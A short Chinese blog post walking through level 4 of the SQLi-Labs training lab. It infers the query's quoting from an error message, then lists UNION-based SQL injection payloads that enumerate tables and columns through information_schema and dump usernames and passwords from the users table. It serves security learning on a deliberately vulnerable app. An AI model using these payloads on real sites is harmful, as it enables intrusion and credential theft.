互动

SQLiLabs打靶-第四关

loker66fan 字数: 3672 阅读耗时: 9 分钟 2024/06/15 博客独享热度: 64 评论: 0

SQLiLabs打靶

第四关

?id=2"       '后显示

根据页面报错信息得知sql语句是双引号字符型且有括号。

输入内容为
2")

所以

?id=1") order by 3--+
?id=-1") union select 1,database(),version() --+
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
?id=-1") union select 1,group_concat(username),group_concat(password) from users --+

第四关完成

原创 SQLiLabs打靶-第四关

SQLiLabs打靶-第四关

本文是原创文章，采用 CC BY-NC-ND 4.0 协议，完整转载请注明来自 loekr

匿名评论隐私政策

你无需删除空行，直接评论以获取最佳展示效果

Steam卡片